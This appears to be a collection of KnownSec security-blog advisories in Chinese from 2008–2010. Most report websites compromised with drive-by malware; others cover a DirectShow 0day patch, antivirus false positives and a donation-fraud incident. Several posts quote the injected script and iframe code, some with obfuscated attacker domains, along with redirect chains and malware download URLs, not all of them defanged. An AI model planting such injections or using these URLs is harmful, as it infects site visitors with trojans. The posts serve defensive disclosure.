知道创宇

发布时间：Fri Jan 8 2010 22:11:56 UTC+0800
最后更新时间：Fri Jan 8 2010 22:11:56 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 安全中国（http://www.anqn.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.anqn.com/3389/index.html

网页被嵌入恶意链接代码：
<script>

document.write(”<iframe width=20 height=1 src=yt.htm></iframe>”);

document.write(”<iframe width=20 height=1 src=ytu.htm></iframe>”);

</script>
挂马分析：
[root]http://www.anqn.com/3389/index.html
    [iframe]http://www.anqn.com/3389/yt.htm
        [script]http://www.anqn.com/3389/nop.jpg
        [script]http://www.anqn.com/3389/ml.jpg
        [script]http://www.anqn.com/3389/rl.jpg
            [exe]http://linuxkk.3322.org/test/q.exe
        [script]http://www.anqn.com/3389/kl.jpg
    [iframe]http://www.anqn.com/3389/ytu.htm
        [iframe]http://www.anqn.com/3389/of.htm
            [script]http://www.anqn.com/3389/rl.jpg
            [script]http://www.anqn.com/3389/nop.jpg
            [script]http://www.anqn.com/3389/fq.jpg
    [script]http://js.users.51.la/3463627.js
最终下载病毒文件：
http://linuxkk.3322.org/test/q.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

发布时间：Sun Jul 12 2009 22:45:41 UTC+0800
最后更新时间：Sun Jul 12 2009 22:45:41 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 河南电视网视频点播系统（http://vod.hntv.ha.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://vod.hntv.ha.cn/

网页被嵌入恶意链接代码：

<script src=http://99j4.org/0.js></script>
挂马分析：
[wide]http://vod.hntv.ha.cn/
 [script]http://99j4.org/0.js
  [frame]http://cc77vv.8866.org/aa/a3a.htm
   [frame]http://cc77vv.8866.org/aa/360.htm
    [script]http://cc77vv.8866.org/aa/go.jpg
    [script]http://cc77vv.8866.org/aa/go1.jpg
   [script]http://js.tongji.linezing.com/1137761/tongji.js
   [script]http://s6.cnzz.com/stat.php?id=1408285&web_id=1408285
  [script]http://count29.51yes.com/click.aspx?id=298952206&logo=12
最终下载病毒文件：
http://kaixin8080.com/svchost.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

由于该网站挂马涉及微软尚未发布补丁的DirectShow漏洞，建议用户临时使用知道创宇DirectShow 0day补丁，下载地址：http://www.knownsec.com/directshowpatch.rar

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 15% [?]

I.DirectShow 0day漏洞简要介绍：
2009年7月4日以后，该漏洞为国内几大挂马集团所利用，漏洞利用代码迅速传播，有些挂马集团甚至撤除原有的所有漏洞利用代码仅更换DirectShow
0day利用代码。
DirectShow 0day影响系统：Windows XP/2003。
截止2009年7月12日0:00，知道创宇安全团队监测到DirectShow 0day挂马源近百个。

由于微软官方尚未发布相关补丁，所以该漏洞利用的成功率极高。建议用户使用该补丁修复。
国内黑客论坛对该漏洞的描述：

II.知道创宇DirectShow 0day补丁使用方法：
1.确定MSVIDCTL.DLL文件版本：
1）经典开始菜单下：“开始”菜单->“搜索”->“文件或文件夹(F)…”->“所有文件和文件夹”
默认开始菜单下：“开始”菜单->“搜索”->“所有文件和文件夹”
2）“要搜索的文件或文件夹名”输入MSVIDCTL.DLL

单击“搜索范围”的下拉菜单选择“浏览”，在对话框中选择“我的电脑”->“C:”（这里选择操作系统所在的逻辑分区的盘符）->“windows”(系统文件夹)

然后单击“立即搜索”，在搜索到的文件上单击右键选择“属性”->“版本”即可看到“文件版本”。这里需要注意的是，该补丁只适用于6.5.2600（6.5.2600.XXXX）版本的文件。

2. 安装补丁
首先要在http://www.knownsec.com/directshowpatch.rar下载补丁。
然后将两个文件解压到同一个目录下，双击directshowpatch.exe

单击“是(Y)”，将自动结束文件替换。

III.文件恢复：
如果补丁造成程序运行不正常可以替换为原来的文件。
可以下载使用如下批处理文件恢复：

http://www.glacierlk.cn/openlab/directshow_resume.rar

有关该漏洞补丁的详细说明参见：

http://www.scanw.com/blog/archives/1076

Popularity: 10% [?]

发布时间：Sat Mar 21 2009 19:59:14 UTC+0800
最后更新时间：Sat Mar 21 2009 19:59:14 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：莱芜人事信息网、天津商业大学、石狮市地方税务局、
 

莱芜人事信息网（hxxp://lwrs.laiwu.gov.cn/）多处被植入恶意代码：
<script src=hxxp://%77%77%77%2E%34%31%39%2E%63%6F%6D%2E%63%6E/1.js></script>
<script src=hxxp://%71%77%72%31%2E%63%6E></script>
恶意链接地址解密后为：
hxxp://www.419.com.cn/1.js
hxxp://qwr1.cn
通过漏洞攻击，最终下载病毒：
hxxp://c-0p.cn:6135/qwer/ms.css
hxxp://c-0p.cn:6135/qwer/as.css
hxxp://c-0p.cn:6135/qwer/bf.css
hxxp://c-0p.cn:6135/qwer/lzz.css
hxxp://c-0p.cn:6135/qwer/re.css
hxxp://c-0p.cn:6135/qwer/real11.css
hxxp://c-0p.cn:6135/baidu.cab
hxxp://c-0p.cn:6135/qwer/adr.css
 

天津商业大学（hxxp://bkzs.njnu.edu.cn/1.js）多处被植入恶意代码：
document.write(”<iframe src=hxxp://12wds.cn:6135/a0076159/a07.htm width=0 height=0></iframe>”)
通过漏洞攻击，最终下载病毒：
hxxp://c-0p.cn:6135/qwer/ms.css
hxxp://c-0p.cn:6135/qwer/as.css
hxxp://c-0p.cn:6135/qwer/bf.css
hxxp://c-0p.cn:6135/qwer/lzz.css
hxxp://c-0p.cn:6135/qwer/re.css
hxxp://c-0p.cn:6135/qwer/real11.css
hxxp://c-0p.cn:6135/baidu.cab
hxxp://c-0p.cn:6135/qwer/adr.css
 

石狮市地方税务局（hxxp://fjqzss-l-tax.gov.cn/）多处被植入恶意代码：
<script src=hxxp://%63%63%6A%33%2E%63%6E></script><script src=hxxp://%63%63%6A%35%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%71%77%72%31%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.wixww.com/new/a1.css
hxxp://d.mxxio.com:88/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 13% [?]

发布时间：Thu Feb 12 2009 14:44:13 UTC+0800
最后更新时间：Thu Feb 12 2009 14:44:13 UTC+0800
________________________________________
 

近日有网友发现,美国雅虎搜索将腾讯、新浪、搜狐等国内多家门户网站定为恶意网站,并且在搜索结果上方用红色字体标识.
除上述网站外,雅虎搜索还将新华网、IT世界网、金山逍遥网、中关村在线、天空下载、北青网、奇虎网、PCPOP等十几家国内知名网站列为恶意网站.

搜狐网站被标识潜在恶意软件威胁

腾讯QQ的IM下载页面也被标识为潜在恶意软件威胁
在雅虎提示的详细信息中,检测结果认为,发现这些站点上的下载包含一些人所认为的广告软件、间谍软件或其他有害程序.而为雅虎搜索提供检测技术支持的公司为McAfee.

知道安全团队随即对以上站点进行检测，并未发现雅虎所警告的潜在恶意软件威胁，有可能是McAfee恶意网站检测系统的误报，网友可放心进入以上被误报的网站。

Popularity: 10% [?]

奥运的时候很多人会通过网络浏览的方式来观看比赛或者了解比赛.

其中sina新浪是一个国内著名的站点,会有很多人去通过他了解奥运相关,这其中可能会有一小部分人在打域名的时候没有注意,不小心拼错了域名.一般来说可能会返回一个404页面,但是现在拼错了sina 就有可能导致系统被攻击从而被黑客入侵.

事件:

仿新浪域名进行挂马:

hXXp://www.sian.com.cn

该域名目前仍然在危害网络,其首页包含一个不可见框架,将连接到一些漏洞攻击页面,其中包含以下漏洞:

ms06-014

Access快照工具漏洞

flash漏洞

联众游戏漏洞

realplayer漏洞

暴风播放器漏洞

请网友上网及时安装好防护软件,杀毒软件以免遭受攻击.针对防御WEB方面的攻击推荐使用365门神软件.可以从http://www.scanw.com得到下载.

另外近期还有部分病毒利用奥运来进行欺骗和传播:

该病毒伪装成福娃形象来引诱用户执行.

网友需特别注意奥运期间的安全防护意识.

Popularity: 36% [?]

https://www.dns-oarc.net/oarc/services/dnsentropy

Popularity: 24% [?]

发布日期：2008-5-20
最后更新日期：2008-5-20   12：37（GMT）

来自：知道安全

Mal_URL :  hXXp://games.enet.com.cn/article/A6320051127002.html

情况：
该地址被黑客插入恶意代码连接（hXXp://d.godaand.cn/bao/p69.htm），访客在访问过程中可能会遭受到包含REAL漏洞，MS06014，暴风影音漏洞，联众世界漏洞，讯雷漏洞的网页ActiveX攻击。该恶意地址企图通过以下漏洞下载病毒：

[wide]http://d.godaand.cn/bao/p69.htm
    [frame]http://d.godaand.cn/14.htm
         [object]http://ccc.52gol.com/xx.exe [06014]
    [frame]http://d.godaand.cn/real.htm
         [object]http://ccc.52gol.com/xx.exe[REAL]
    [frame]http://d.godaand.cn/real11.htm
         [object]http://ccc.52gol.com/xx.exe[REAL]
    [frame]http://d.godaand.cn/lz.htm
         [object]http://ccc.52gol.com/xx.exe[联众]
    [frame]http://d.godaand.cn/bfyy.htm
         [object]http://ccc.52gol.com/xx.exe[暴风]
    [frame]http://d.godaand.cn/bao/xl.htm
         [object]http://ccc.52gol.com/xx.exe[讯雷]

推荐的应对方法：

在你的电脑里将ccc.52gol.com，d.godaand.cn添加到HOSTS文件进行屏蔽。

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 14% [?]

发布日期：2008-5-18

最后更新日期：2008-5-18   11：37（GMT）

KAV6.0误杀了系统文件wininet.dll，将其报为病毒：Trojan.Win32.Agent.mue，假如用户选择清除该病毒，会导致系统无法启动。请KAV6.0的用户等待官方更新病毒库并且不要删除该文件。已经删除该文件的用户，可用系统盘引导进入DOS下修复该文件。

Popularity: 15% [?]

大陆四川遭强震袭击，灾情惨重，各地慷慨解囊，不过中共公安证实，部分「红十字会」官方网站遭骇客非法入侵，不法份子擅自窜改网页上向民众募款的帐号，实施诈骗。有关当局已向各地紧急通报，呼吁民众提高警觉。

「宁波」银行监督局表示，他们在接获紧急通报之后，已经利用大众传播，公佈救灾捐款的专用帐号，并一再提醒民众汇款救灾时，一定要仔细核对帐号，或请银行柜檯人员协助核实。

来源：中广新闻网

Popularity: 13% [?]